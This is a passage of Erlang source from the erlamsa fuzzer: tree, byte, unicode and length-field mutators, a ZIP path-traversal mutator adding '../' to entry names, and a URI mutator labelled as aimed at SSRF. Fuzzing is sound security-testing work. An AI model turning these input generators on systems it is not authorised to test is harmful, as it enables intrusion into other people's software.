        {-1, Meta}, Cs),
    BinData = list_to_binary(erlamsa_strlex:unlex(Ms)),
    %% BUG FIX: the continuation must be this mutator itself; the original
    %% returned fun base64_mutator/2 (copy-paste from base64_mutator above),
    %% silently switching mutator identity after the first application.
    {fun uri_mutator/2, [BinData | T], NewMeta, NewD}.
%%
%% Guessed Parse-tree Mutations
%%
%% Map an opening delimiter byte to its closing byte, or false when the
%% byte does not open a delimited region.
-spec usual_delims(non_neg_integer()) -> non_neg_integer() | false.
%% ?? could be settable from command line
usual_delims(40) -> 41;   % ()
usual_delims(91) -> 93;   % []
usual_delims(60) -> 62;   % <>
usual_delims(123) -> 125; % {}
usual_delims(34) -> 34;   % ""
usual_delims(39) -> 39;   % ''
usual_delims(_) -> false.
-spec grow(list(), byte(), list()) -> {list(), list() | false}.
%% -> {lst, false} = ran out of data trying to parse up to Close, but lst
%%    is the same with partial parsing
%% -> {lst, tail}  = did successfully parse up to Close; ready node is lst,
%%    tail is the following data
grow([], _Close, Rout) -> %% out of data, didn't find close. return partial parse.
    {lists:reverse(Rout), false};
grow([H|T], Close, Rout) when H =:= Close -> %% match complete, return with rest of list
    {lists:reverse([Close | Rout]), T};
grow([H|T], Close, Rout) ->
    Next_close = usual_delims(H),
    case Next_close of
        false -> %% add one byte to this node
            grow(T, Close, [H | Rout]);
        _Else ->
            {This, Lst} = grow(T, Next_close, []),
            if %% we didn't run out of data and this is a single tree node
                Lst =:= false ->
                    {lists:reverse(Rout) ++ [H | This], false};
                %% we ran out of data. this is a list of partial parses (having the data of
                %% lst after hd in some form) which we want to preserve as tail
                true ->
                    grow(Lst, Close, [[H | This] | Rout])
            end
    end.
% -spec count_nodes(list()) -> non_neg_integer().
% %% count how many list nodes are in a tree structure
% count_nodes(Lst) -> count_nodes(Lst, 0).
% -spec count_nodes(list(), non_neg_integer()) -> non_neg_integer().
% count_nodes([], N) -> N;
% count_nodes([H|T], N) when is_list(H) ->
% count_nodes(T, count_nodes(H, N+1));
% count_nodes([_|T], N) ->
% count_nodes(T, N).
-spec sublists(list()) -> list().
%% lst -> a list of lists (not counting tails) in lst, when walked
%% recursively, not counting lst itself
sublists(Lst) -> sublists(Lst, []).

-spec sublists(list(), list()) -> list().
sublists([], Found) -> Found;
sublists([H|T], Found) when is_list(H) ->
    sublists(T, sublists(H, [H|Found]));
sublists([_H|T], Found) ->
    sublists(T, Found).
%% Pick a random sublist node of Lst, or false when the tree has none.
-spec pick_sublist(list()) -> list().
pick_sublist(Lst) ->
    Subs = sublists(Lst),
    case Subs of
        [] -> false;
        _Else ->
            erlamsa_rnd:rand_elem(Subs)
    end.
%% TODO: type for fun().
%% Walk the tree and replace the node whose head equals Sub with Op(node).
-spec edit_sublist(list(), list(), fun()) -> list().
edit_sublist(Lst, Sub, Op) ->
    lists:reverse(edit_sublist(Lst, Sub, Op, [])).

%% replace the node (sub . tail) with (op (sub . tail))
%% NOTE(review): the middle clause recurses into H via the 3-arity walk even
%% when H is not a list, which appears to wrap non-list heads into singleton
%% lists -- confirm this is the intended behaviour (matches upstream radamsa).
-spec edit_sublist(list(), list(), fun(), list()) -> list().
edit_sublist(Lst = [H|_T], Sub, Op, Acc) when H =:= Sub ->
    [Op(Lst)|Acc];
edit_sublist([H|T], Sub, Op, Acc) ->
    NewH = edit_sublist(H, Sub, Op),
    edit_sublist(T, Sub, Op, [NewH|Acc]);
edit_sublist(Lst, _Sub, _Op, Acc) ->
    [Lst|Acc].
%% TODO: type for fun().
-spec edit_sublists(list(), gb_trees:tree()) -> list().
%% lst (ff of node -> (node -> node)) -> lst'; <- could also be done with a recursive-mapn
%% Walk the tree; when a sublist node has an op registered in OpFF, apply it,
%% otherwise keep recursing into it.
edit_sublists([Hd|T], OpFF) when is_list(Hd) ->
    MaybeOp = erlamsa_utils:get(Hd, false, OpFF),
    case MaybeOp of
        false ->
            [edit_sublists(Hd, OpFF) | edit_sublists(T, OpFF)];
        _ ->
            [MaybeOp(Hd) | edit_sublists(T, OpFF)]
    end;
edit_sublists([H|T], OpFF) ->
    [H | edit_sublists(T, OpFF)];
edit_sublists(Lst, _) -> Lst.
%% Guess a parse tree from a byte list: bytes that open a usual delimiter
%% start a nested node grown up to the matching close; everything else is
%% kept flat. Unclosed regions degrade to a flat partial parse.
-spec partial_parse(list()) -> list().
partial_parse(Lst) -> partial_parse(Lst, []).

-spec partial_parse(list(), list()) -> list().
partial_parse([], Rout) ->
    lists:reverse(Rout);
partial_parse([H|T], Rout) ->
    CloseP = usual_delims(H),
    case CloseP of
        false ->
            partial_parse(T, [H | Rout]);
        _ ->
            {This, Lst} = grow(T, CloseP, []),
            case Lst of
                false ->
                    lists:reverse(Rout) ++ [H|This];
                _ ->
                    partial_parse(Lst, [[H|This] | Rout])
            end
    end.
% -spec flatten(list(), list()) -> list().
% flatten([], Tl) ->
% Tl;
% flatten([H|T], Tl) ->
% flatten(H, flatten(T, Tl));
% flatten(Node, Tl) ->
% [Node | Tl].
%% TODO: type for fun().
%% Build a tree mutator: partially parse the head binary, pick a random
%% sublist node and rewrite it with Op. Binary-looking data is skipped.
-spec sed_tree_op(fun(), atom()) -> mutation_fun().
sed_tree_op(Op, Name) ->
    fun F (Ll = [H|T], Meta) ->
        case erlamsa_utils:binarish(H) of
            true -> {F, Ll, Meta, -1};
            false ->
                NewMeta = [{Name, 1} | Meta],
                Lst = partial_parse(binary_to_list(H)),
                Sub = pick_sublist(Lst), %% choose partially parsed node to mutate ;; fixme: not checked for F
                NewLst = edit_sublist(Lst, Sub, Op),
                {F, [erlang:iolist_to_binary(NewLst) | T], NewMeta, 1}
        end
    end.
%% Duplicate a parse-tree node in place.
-spec sed_tree_dup() -> mutation_fun().
sed_tree_dup() ->
    sed_tree_op(fun (Node = [H|_T]) -> [H|Node] end, tree_dup).
%% Delete a parse-tree node.
-spec sed_tree_del() -> mutation_fun().
sed_tree_del() ->
    sed_tree_op(fun ([_H|T]) -> T end, tree_del).
-spec sed_tree_swap_one(list(), list()) -> list().
%% overwrite one node with one of the others
sed_tree_swap_one(Lst, Subs) ->
    ToSwap = erlamsa_rnd:reservoir_sample(Subs, 2),
    [A | [B | _]] = erlamsa_rnd:random_permutation(ToSwap),
    edit_sublist(Lst, A, fun ([_|Tl]) -> [B | Tl] end).
-spec sed_tree_swap_two(list(), list()) -> list().
%% pairwise swap of two nodes
%% TODO: here there is a bug (also in original radamsa) that causes to swap
%% child with the parent node, could be feature xD
sed_tree_swap_two(Lst, Subs) ->
    ToSwap = erlamsa_rnd:reservoir_sample(Subs, 2),
    [A | [B | _]] = ToSwap,
    Mapping = gb_trees:enter(B, fun(_X) -> A end, gb_trees:enter(A, fun (_X) -> B end, gb_trees:empty())),
    edit_sublists(Lst, Mapping).
%% TODO: type for fun().
%% Build a swap-based tree mutator: requires at least two sublist nodes,
%% otherwise passes data through with delta -1.
-spec construct_sed_tree_swap(fun(), atom()) -> mutation_fun().
construct_sed_tree_swap(Op, Name) ->
    fun F (Ll = [H|T], Meta) ->
        case erlamsa_utils:binarish(H) of
            true -> {F, Ll, Meta, -1};
            false ->
                Lst = partial_parse(binary_to_list(H)),
                Subs = sublists(Lst),
                N = length(Subs),
                case N < 2 of
                    true -> {F, Ll, Meta, -1};
                    false ->
                        NewLst = Op(Lst, Subs),
                        {F, [erlang:iolist_to_binary(NewLst) | T], [{Name, 1} | Meta], 1}
                end
        end
    end.
%% tree stutter
-spec repeat_path(list(), list(), non_neg_integer()) -> list().
repeat_path(Parent, _Child, N) when N < 2 ->
    Parent; %% <- causes at least 1 extra path to be made, saves one useless replace cycle
repeat_path(Parent, Child, N) ->
    %% preventing too deep lists
    case erlang:process_info(self(), memory) of
        {memory, Mem} when Mem > 256000000 ->
            Parent;
        _Else ->
            edit_sublist(Parent, Child,
                fun ([_H|T]) -> [repeat_path(Parent, Child, N-1) | T] end)
    end.
%% Pick a random sublist of Node, or false when it has none.
-spec choose_child(list()) -> false | list().
choose_child(Node) ->
    Subs = sublists(Node),
    case Subs of
        [] -> false;
        _Else -> erlamsa_rnd:rand_elem(Subs)
    end.
%% Find the first node in the (shuffled) list that has a child sublist;
%% returns {Parent, Child} or {false, false} when none qualifies.
-spec choose_stutr_nodes(list()) -> {false | list(), false | list()}.
choose_stutr_nodes([]) -> {false, false}; %% no child nodes
choose_stutr_nodes([H|T]) ->
    Childp = choose_child(H),
    case Childp of
        false -> choose_stutr_nodes(T);
        _Else -> {H, Childp}
    end.
%% Tree stutter mutation: pick a parent/child pair in the guessed parse
%% tree and replace the child with the parent path repeated ~log-random
%% number of times. Binary-looking data is skipped with delta -1.
-spec sed_tree_stutter(list_of_bins(), meta_list()) -> mutation_res().
sed_tree_stutter(Ll = [H|T], Meta) ->
    case erlamsa_utils:binarish(H) of
        true -> {fun sed_tree_stutter/2, Ll, Meta, -1};
        false ->
            Lst = partial_parse(binary_to_list(H)), %% (byte|node ...)
            Subs = sublists(Lst),
            RandSubs = erlamsa_rnd:random_permutation(Subs),
            {Parent, Child} = choose_stutr_nodes(RandSubs),
            N_reps = erlamsa_rnd:rand_log(10),
            case Parent of
                false -> {fun sed_tree_stutter/2, Ll, Meta, -1};
                _Else ->
                    NewLst = edit_sublist(Lst, Child,
                        fun ([_H|Tl]) -> [repeat_path(Parent, Child, N_reps)|Tl] end),
                    {fun sed_tree_stutter/2,
                     [erlang:iolist_to_binary(NewLst) | T],
                     [{tree_stutter, 1} | Meta], 1}
            end
    end.
%%
%% UTF-8
%%
%% grab low 6 bits of a number and set the UTF-8 continuation bit (10xxxxxx)
-spec ext(integer()) -> integer().
ext(N) ->
    (N band 2#111111) bor 2#10000000.

-spec encode_point(integer()) -> [integer()].
%% encode a unicode code point to utf-8 bytes
%% (clause heads restored: the original source lost them together with the
%% stripped comment markers; guards follow the standard UTF-8 ranges)
encode_point(Point) when Point < 16#80 ->    %% ascii, fits 7 bits
    [Point];
encode_point(Point) when Point < 16#800 ->   %% 5 + 6 bits
    [16#c0 bor (16#1f band (Point bsr 6)),
        ext(Point)];
encode_point(Point) when Point < 16#10000 -> %% 4 + 2*6 bits
    [16#e0 bor (16#0f band (Point bsr 12)),
        ext(Point bsr 6),
        ext(Point)];
encode_point(Point) ->                       %% 3 + 3*6 bits
    [16#f0 bor (2#111 band (Point bsr 18)),
        ext(Point bsr 12),
        ext(Point bsr 6),
        ext(Point)].
-spec funny_unicode() -> list().
%% TODO: VERY INEFFECTIVE, should be constant...
%% List of "funny" unicode byte sequences: BOMs, nulls, odd encodings from
%% wikipedia, plus UTF-8 encodings of troublesome code points.
%% NOTE(review): the first two Manual entries (utf-8 of 65535/65536) and the
%% utf16 le bom line were reconstructed after the source lost them together
%% with stripped comment markers -- verify against upstream erlamsa.
funny_unicode() ->
    Manual = [[239, 191, 191],          % 65535
              [240, 144, 128, 128],     % 65536
              [16#ef, 16#bb, 16#bf],    % the canonical utf8 bom
              [16#fe, 16#ff],           % utf16 be bom
              [16#ff, 16#fe],           % utf16 le bom
              [0, 0, 16#ff, 16#ff],     % ascii null be
              [16#ff, 16#ff, 0, 0],     % ascii null le
              [43, 47, 118, 56],        % and some others from wikipedia
              [43,47,118,57],[43,47,118,43],[43,47,118,47],
              [247,100,76],[221,115,102,115],[14,254,255],[251,238,40],
              [251,238,40,255],[132,49,149,51]],
    Codes = [[16#0009,16#000d],16#008D, 16#00a0,16#1680,16#180e,
             [16#2000,16#200a],16#2028,16#2029,16#202f,16#205f,
             16#3000,[16#200e,16#200f],[16#202a,16#202e],
             [16#200c,16#200d],16#0345,16#00b7,[16#02d0,16#02d1],
             16#ff70,[16#02b0,16#02b8],16#fdd0,16#034f,
             [16#115f,16#1160],[16#2065,16#2069],16#3164,16#ffa0,
             16#e0001,[16#e0020,16#e007f],
             [16#0e40,16#0e44],16#1f4a9],
    Numbers = lists:foldl(
        fun
            ([X,Y], Acc) -> lists:seq(X,Y) ++ Acc;
            (X, Acc) -> [X|Acc]
        end, [], Codes),
    Manual ++ [encode_point(X) || X <- Numbers].
%% Try to make a code point too wide: if the byte at a random position is
%% 7-bit, re-encode it as an overlong 2-byte UTF-8 sequence.
-spec sed_utf8_widen(list_of_bins(), meta_list()) -> mutation_res().
sed_utf8_widen([H|T], Meta) ->
    P = erlamsa_rnd:rand(size(H)),
    D = erlamsa_rnd:rand_delta(),
    {fun sed_utf8_widen/2,
     [edit_byte_vector(H, P,
        fun (B) when B =:= B band 2#111111 -> N = B bor 2#10000000, <<2#11000000:8, N:8>>;
            (B) -> <<B:8>>
        end)
     | T], [{sed_utf8_widen, D}|Meta], D}.
%% Insert a "funny unicode" byte sequence after a random byte position.
-spec sed_utf8_insert(list_of_bins(), meta_list()) -> mutation_res().
sed_utf8_insert([H|T], Meta) ->
    P = erlamsa_rnd:rand(size(H)),
    D = erlamsa_rnd:rand_delta(),
    Bin = list_to_binary(erlamsa_rnd:rand_elem(funny_unicode())),
    {fun sed_utf8_insert/2,
     [edit_byte_vector(H, P,
        fun (B) -> <<B:8, Bin/binary>> end)
     | T], [{sed_utf8_insert, D}|Meta], D}.
%% Null debug mutator -- passes data "as is" -- for testing
%% Null debug mutator -- passes data "as is" with delta -1 (for testing).
-spec nomutation(list_of_bins(), meta_list()) -> mutation_res().
nomutation(Ll, Meta) ->
    {fun nomutation/2, Ll, [{nomutation, -1}|Meta], -1}.
%%
%% Length predict mutations -- trying to mutate len
%%
%% TODO: correct spec
%%-spec mutate_length(binary()) -> {integer(), binary()}.
%% Mutate a predicted length field / its blob. Elem describes the detected
%% field: {ok, Size(bits), Endianness, Len, A(offset bytes), _}; an empty
%% Elem means no field was found and the binary is returned with delta -2.
mutate_length(Binary, []) -> {-2, Binary};
mutate_length(Binary, _Elem = {ok, Size, Endianness, Len, A, _B}) ->
    Am8 = A * 8, Len8 = Len * 8,
    {H, Len, Blob, Rest} = erlamsa_field_predict:extract_blob(Endianness, Binary, Am8, Size, Len8),
    <<TmpNewLen:Size>> = erlamsa_rnd:random_block(trunc(Size/8)),
    NewLen = min(?ABSMAX_BINARY_BLOCK, TmpNewLen*2),
    Result =
        case erlamsa_rnd:rand(7) of
            %% set len field = 0
            0 -> <<H:Am8, 0:Size, Blob:Len8, Rest/binary>>;
            %% set len field = 0xFF..FF
            1 -> <<H:Am8, -1:Size, Blob:Len8, Rest/binary>>;
            %% expand blob field with random data
            2 ->
                RndBlock = erlamsa_rnd:fast_pseudorandom_block(NewLen),
                TmpBin = erlamsa_field_predict:rebuild_blob(Endianness, H, Am8, Len, Size, Blob, Len8, RndBlock),
                <<TmpBin/binary, Rest/binary>>;
            %% drop blob field
            3 ->
                erlamsa_field_predict:rebuild_blob(Endianness, H, Am8, NewLen, Size, 0, 0, Rest);
            %% set len field = random bytes(..)
            _Else ->
                erlamsa_field_predict:rebuild_blob(Endianness, H, Am8, NewLen, Size, Blob, Len8, Rest)
        end,
    {+1, Result}.
%% Length-predict mutator: guess a simple length field in the head binary
%% and mutate it (or its blob).
-spec length_predict(list_of_bins(), meta_list()) -> mutation_res().
length_predict([H|T], Meta) ->
    Elem = erlamsa_rnd:rand_elem(erlamsa_field_predict:get_possible_simple_lens(H)),
    {D, Bin} = mutate_length(H, Elem),
    {fun length_predict/2, [Bin|T], [{muta_len, D}|Meta], D}.
%%
%% ZIP Path traversal
%%
%% zip:foldl/3 callback: prepend 0..19 "../" segments to each archive entry
%% name; I/B are zip's get-info/get-binary thunks, Acc collects create specs.
mutate_zip_path(FileName, I, B, Acc) ->
    R = erlamsa_rnd:rand(20),
    NewFileName = lists:flatten([ "../" || _A <- lists:seq(1,R)] ++ FileName),
    [{NewFileName, B(), I()} | Acc].
%% ZIP path traversal: rewrite every entry name of an in-memory archive to
%% contain "../" segments; non-zip data is passed through with delta -1.
-spec zip_path_traversal(list_of_bins(), meta_list()) -> mutation_res().
zip_path_traversal([H|T], Meta) ->
    Name = "inmemory.zip",
    case zip:foldl(fun mutate_zip_path/4, [], {Name, H}) of
        {ok, FileSpec} ->
            {ok, {Name, Bin}} = zip:create(Name, lists:reverse(FileSpec), [memory]),
            {fun zip_path_traversal/2, [Bin|T], [{muta_zippath, +1}|Meta], +1};
        _Else ->
            {fun zip_path_traversal/2, [H|T], [{muta_zippath, -1}|Meta], -1}
    end.
%%
%% Basic type mutations (for fuzzing record-related (e.g. protobuf, ASN.1, etc) data
%%
%% Mutate a binary value with a randomly selected inner mutation.
-spec basic_mutate_binary(binary()) -> binary().
basic_mutate_binary(Binary) ->
    Muta = erlamsa_mutations:mutators_mutator(erlamsa_mutations:inner_mutations(default)),
    {_NewMuta, NewLstBin, _Meta} = Muta([Binary], []),
    hd(NewLstBin).
-spec basic_mutate_list(list()) -> list().
%% Mutate a list value with a randomly chosen structural mutation.
basic_mutate_list(Lst) -> basic_mutate_list(Lst, erlamsa_rnd:rand(12)).

%% (clause heads for rolls 5..8 restored; the source lost them together with
%% the stripped comment markers)
-spec basic_mutate_list(list(), 0..12) -> list().
basic_mutate_list(_Lst, 0) -> []; %% replace with empty
basic_mutate_list(Lst, 1) -> Lst ++ Lst; %% dup a list
basic_mutate_list(Lst, 2) -> %% permute a list
    erlamsa_rnd:random_permutation(Lst);
basic_mutate_list(Lst, 3) -> %% delete an element
    erlamsa_generic:list_del(Lst, length(Lst));
basic_mutate_list(Lst, 4) -> %% delete a sequence of elements
    erlamsa_generic:list_del_seq(Lst, length(Lst));
basic_mutate_list(Lst, 5) -> %% duplicate an element
    erlamsa_generic:list_dup(Lst, length(Lst));
basic_mutate_list(Lst, 6) -> %% repeat an element
    erlamsa_generic:list_repeat(Lst, length(Lst));
basic_mutate_list(Lst, 7) -> %% clone an element closeby
    erlamsa_generic:list_clone(Lst, length(Lst));
basic_mutate_list(Lst, 8) -> %% swap two elements
    erlamsa_generic:list_swap(Lst, length(Lst));
basic_mutate_list([], _) -> [];
basic_mutate_list(Lst, _) -> %% mutate an element
    R = erlamsa_rnd:erand(length(Lst)),
    erlamsa_utils:applynth(R, Lst, fun basic_type_mutation/1).
-spec basic_mutate_string(list()) -> list().
%% Mutate a string: if it is mostly (>= 80%) printable ASCII, mutate it as a
%% binary; otherwise treat it as a generic list.
basic_mutate_string([]) -> []; %% FIX: avoid badarith (0/0) on empty strings
basic_mutate_string(Str) ->
    L = length(Str),
    Asciis = lists:foldl(fun (A, Acc) when A>31,A<127 -> Acc+1; (_,Acc) -> Acc end, 0, Str),
    if
        Asciis / L >= 0.8 -> binary_to_list(basic_mutate_binary(list_to_binary(Str)));
        true -> basic_mutate_list(Str)
    end.
%% Probabilistic wrapper: mutate El only when a uniform random draw falls
%% below Prob; otherwise return it unchanged.
-spec basic_type_mutation(any(), float()) -> any().
basic_type_mutation(El, Prob) -> basic_type_mutation(El, erlamsa_rnd:rand_float(), Prob).

-spec basic_type_mutation(any(), float(), float()) -> any().
basic_type_mutation(El, Rnd, Prob) when Rnd >= Prob -> El;
basic_type_mutation(El, _Rnd, _Prob) -> basic_type_mutation(El).
%% Dispatch a type-appropriate mutation; unknown types pass through.
-spec basic_type_mutation(any()) -> any().
%% mutate boolean -- just NOT
basic_type_mutation(true) -> false;
basic_type_mutation(false) -> true;
%% mutate a list (head is not an integer, so not a char list)
basic_type_mutation(El = [H|_]) when is_list(El), is_integer(H) =/= true -> basic_mutate_list(El);
%% mutate a string or list of integers
basic_type_mutation(El) when is_list(El) -> basic_mutate_string(El);
%% mutate a binary
basic_type_mutation(El) when is_binary(El) -> basic_mutate_binary(El);
%% mutate an integer
basic_type_mutation(El) when is_integer(El) -> mutate_num(El);
%% mutate a float
basic_type_mutation(El) when is_float(El) -> mutate_float(El);
basic_type_mutation(El) -> El.
%%
%% Main Mutation Functions
%%
%% Apply a score delta to a mutator priority, clamped to
%% [?MIN_SCORE .. ?MAX_SCORE]; a zero delta is a no-op.
-spec adjust_priority(non_neg_integer(), non_neg_integer()) -> non_neg_integer().
%% limit to [min-score .. max-score]
adjust_priority(Pri, 0) -> Pri;
adjust_priority(Pri, Delta) ->
    max(?MIN_SCORE, min(?MAX_SCORE, Pri + Delta)).
%% Order mutations by a random draw weighted by score*priority (descending).
-spec weighted_permutations([mutation()]) -> [mutation()].
%% [{Score, Priority, _, _}, ...] -> [{Rand(S*P), {...}}, ...] -> sort -> [{...}, ...]
weighted_permutations([]) -> [];
weighted_permutations(Pris) ->
    PPris = lists:map(fun (X = {S, P, _, _}) -> {erlamsa_rnd:rand(trunc(S*P)), X} end, Pris),
    SPPris = lists:sort(fun ({A,_},{B,_}) -> A>=B end, PPris),
    [ X || {_, X} <- SPPris].
%% Mutators have a score they can change themselves (1-100) and a priority given by
%% the user at command line. Activation probability is (score*priority)/SUM(total-scores).
%%TODO: decribe fun() type
-spec mux_fuzzers([mutation()]) -> fun().
%% (#(score priority name) ...) -> merged-mutafn :: rs ll meta -> merged-mutafn' rs' ll' meta'
mux_fuzzers(Fs) ->
    fun
        L([<<>>], Meta) -> {mux_fuzzers(Fs), [<<>>], Meta}; %% TODO: if some mutation goes wrong, these could be infinite loop; redesign in future
        L([], Meta) -> {mux_fuzzers(Fs), <<>>, Meta};
        L(Ll, Meta) when is_list(Ll) ->
            mux_fuzzers_loop(Ll, weighted_permutations(Fs), [], Meta);
        L(Ll, Meta) when is_function(Ll) -> L(Ll(), Meta) %% TODO: strange behaviour
    end.
-spec mux_fuzzers_loop(lazy_list_of_bins(), [mutation()], [mutation()], meta_list()) -> {fun(), lazy_list_of_bins(), meta_list()}.
%% Try mutators in (weighted-shuffled) order until one actually changes the
%% data; score of each tried mutator is adjusted by the returned delta.
%% (the Res destructuring and NOut lines were restored; the source lost them
%% together with the stripped comment markers)
mux_fuzzers_loop(Ll, [], Out, Meta) -> {mux_fuzzers(Out), Ll, Meta};
mux_fuzzers_loop(Ll = [H|_T], [_Node|Tail], Out, Meta) when is_binary(H), byte_size(H) > ?ABSMAX_BINARY_BLOCK ->
    {mux_fuzzers(Out ++ Tail), Ll, [{skipped_big, byte_size(H)} | Meta]};
mux_fuzzers_loop(Ll, [Node|Tail], Out, Meta) ->
    {Mscore, MPri, Fn, Mname} = Node,
    Res = Fn(Ll, Meta),
    {_MFn, Mll, MMeta, Delta} = Res, %% in radamsa (mfn rs mll mmeta delta) = Fn(...), that strange, TODO: check it
    NOut = [{adjust_priority(Mscore, Delta), MPri, Fn, Mname} | Out], %% in radamsa mfn instead of fn
    IsMll = is_list(Mll),
    if
        IsMll andalso (hd(Mll) == hd(Ll)) -> mux_fuzzers_loop(Ll, Tail, NOut, [{failed, Mname} | MMeta]);
        true -> {mux_fuzzers(NOut ++ Tail), Mll, [{used, Mname} | MMeta]}
    end.
%% Default mutations list with no external mutators.
-spec mutations() -> [mutation()].
%% default mutations list
mutations() ->
    mutations([]).
%% Default mutations list + external mutas. Each entry is
%% {MaxScore, Priority, MutationFun, ShortName, Description}.
-spec mutations([mutation()]) -> [mutation()].
%% default mutations list + external mutas
mutations(CustomMutas) ->
    [{?MAX_SCORE, 10, fun erlamsa_sgml:sgml_mutate/2, sgm, "SGML tree mutations"},
    {?MAX_SCORE, 3, fun erlamsa_json:json_mutate/2, js, "JSON tree mutations"},
    {?MAX_SCORE, 1, fun sed_utf8_widen/2, uw, "try to make a code point too wide"},
    {?MAX_SCORE, 2, fun sed_utf8_insert/2, ui, "insert funny unicode"},
    {?MAX_SCORE, 1, construct_ascii_bad_mutator(), ab, "enhance silly issues in ASCII string data handling"},
    {?MAX_SCORE, 1, construct_ascii_delimeter_mutator(), ad, "play with delimeters in ASCII string data"},
    {?MAX_SCORE, 1, sed_tree_dup(), tr2, "duplicate a node"},
    {?MAX_SCORE, 1, sed_tree_del(), td, "delete a node"},
    {?MAX_SCORE, 3, fun sed_num/2, num, "try to modify a textual number"},
    {?MAX_SCORE, 2, construct_sed_tree_swap(fun sed_tree_swap_one/2, tree_swap_one), ts1, "swap one node with another one"},
    {?MAX_SCORE, 2, fun sed_tree_stutter/2, tr, "repeat a path of the parse tree"},
    {?MAX_SCORE, 2, construct_sed_tree_swap(fun sed_tree_swap_two/2, tree_swap_two), ts2, "swap two nodes pairwise"},
    {?MAX_SCORE, 1, construct_sed_byte_drop(), bd, "drop a byte"},
    {?MAX_SCORE, 1, construct_sed_byte_inc(), bei, "increment a byte by one"},
    {?MAX_SCORE, 1, construct_sed_byte_dec(), bed, "decrement a byte by one"},
    {?MAX_SCORE, 1, construct_sed_byte_flip(), bf, "flip one bit"},
    {?MAX_SCORE, 1, construct_sed_byte_insert(), bi, "insert a byte"},
    {?MAX_SCORE, 1, construct_sed_byte_random(), ber, "swap a byte with random one"},
    {?MAX_SCORE, 1, construct_sed_byte_repeat(), br, "repeat a byte"},
    {?MAX_SCORE, 1, construct_sed_bytes_perm(), sp, "permute a sequence of bytes"},
    {?MAX_SCORE, 1, construct_sed_bytes_repeat(), sr, "repeat a sequence of bytes"},
    {?MAX_SCORE, 1, construct_sed_bytes_drop(), sd, "delete a sequence of bytes"},
    {?MAX_SCORE, 1, construct_sed_bytes_randmask([fun mask_nand/1, fun mask_or/1, fun mask_xor/1]), snand, "NAND/OR/XOR random bytes from block with 2^random values"},
    {?MAX_SCORE, 1, construct_sed_bytes_randmask([fun mask_replace/1]), srnd, "replace random bytes from block with random values"},
    {?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_del/2, line_del), ld, "delete a line"},
    {?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_del_seq/2, line_del_seq), lds, "delete many lines"},
    {?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_dup/2, line_dup), lr2, "duplicate a line"},
    {?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_clone/2, line_clone), lri, "copy a line closeby"},
    {?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_repeat/2, line_repeat), lr, "repeat a line"},
    {?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_swap/2, line_swap), ls, "swap two lines"},
    {?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_perm/2, line_perm), lp, "swap order of lines"},
    {?MAX_SCORE, 1, construct_st_line_muta(fun erlamsa_generic:st_list_ins/2, list_ins, [0]), lis, "insert a line from elsewhere"},
    {?MAX_SCORE, 1, construct_st_line_muta(fun erlamsa_generic:st_list_replace/2, list_replace, [0]), lrs, "replace a line with one from elsewhere"},
    {?MAX_SCORE, 2, fun sed_fuse_this/2, ft, "jump to a similar position in block"},
    {?MAX_SCORE, 1, fun sed_fuse_next/2, fn, "likely clone data between similar positions"},
    {?MAX_SCORE, 2, fun sed_fuse_old/2, fo, "fuse previously seen data elsewhere"},
    {?MAX_SCORE, 2, fun length_predict/2, len, "predicted length mutation"},
    {?MAX_SCORE, 7, fun base64_mutator/2, b64, "try mutate base64-encoded block"},
    {?MAX_SCORE, 1, fun uri_mutator/2, uri, "try mutate URI to cause SSRF"},
    {?MAX_SCORE, 1, fun zip_path_traversal/2, zip, "ZIP path traversal"},
    {?MAX_SCORE, 0, fun nomutation/2, nil, "no mutation will occur (debugging purposes)"}
    |CustomMutas].
%% convert mutas list to standalone format
%% {Max_Score, Pri, F, Name, Desc} -> {Score, Pri, F, Name}
%% Strip the description element from each mutation tuple.
-spec mutas_list(list()) -> [mutation()].
mutas_list(Lst) ->
    lists:map(fun({Score, Pri, F, Name, _Desc}) -> {Score, Pri, F, Name} end, Lst).
%% JSON/XML inner mutations
%% Short names of mutations allowed inside a given structured format
%% (used to avoid re-running a tree mutator on its own output).
-spec inner_mutations_list(atom()) -> [atom()].
inner_mutations_list(sgml) -> [ab, ad, bd, b64, ld, lp, lri, lr, num, sd, uri, json];
inner_mutations_list(json) -> [ab, ad, b64, num, sd, sp, sr, uri, sgm];
inner_mutations_list(_) -> [ab, ad, ber, b64, ld, lp, lri, lr, num, sd, srnd, sxor, uri, zip].
%% Filter the default mutations down to those allowed for Case,
%% dropping the description element.
-spec inner_mutations(atom()) -> [mutation()].
inner_mutations(Case) ->
    InnerMutationsMap = maps:from_list(lists:map(fun (A) -> {A, ok} end, inner_mutations_list(Case))),
    lists:foldl(
        fun({Sc, Pri, Fun, Name, _Desc}, Acc) ->
            case maps:get(Name, InnerMutationsMap, no) of
                ok -> [{Sc, Pri, Fun, Name}|Acc];
                no -> Acc
            end
        end,
        [], mutations([])).
%% Default {Name, Priority} pairs for the command-line mutation selection.
-spec default(list()) -> [{atom(), non_neg_integer()}].
default(CustomMutas) -> [{Name, Pri} || {_, Pri, _, Name, _Desc} <- mutations(CustomMutas)].
%% Render a mutations list as a comma-separated "name" / "name=pri" string
%% (priority 1 is the default and is omitted).
-spec tostring(list()) -> string().
tostring(Lst) ->
    lists:foldl(fun ({_, Pri, _, Name, _Desc}, Acc) ->
                    case Pri of
                        1 -> atom_to_list(Name) ++ "," ++ Acc;
                        _Else -> atom_to_list(Name) ++ "=" ++ integer_to_list(Pri) ++ "," ++ Acc
                    end
                end, [], Lst).
%% Build the multiplexing mutator from user-selected {Name, Priority} pairs:
%% keep only the selected mutations, replacing priority with the user value.
-spec make_mutator([{atom(), non_neg_integer()}], list()) -> fun().
make_mutator(Lst, CustomMutas) ->
    SelectedMutas = maps:from_list(Lst),
    Mutas = lists:foldl(
        fun ({Score, _Pri, F, Name, _Desc}, Acc) ->
            Val = maps:get(Name, SelectedMutas, notfound),
            case Val of
                notfound -> Acc;
                _Else -> [{Score, Val, F, Name} | Acc]
            end
        end,
        [],
        mutations(CustomMutas)),
    mutators_mutator(Mutas).
%% Randomize each mutator's score (>= 2) and wrap the list in a
%% multiplexing fuzzer.
-spec mutators_mutator([mutation()]) -> fun().
%% randomize mutator scores
mutators_mutator(Mutas) ->
    mutators_mutator(Mutas, []).

-spec mutators_mutator([mutation()], [mutation()]) -> fun().
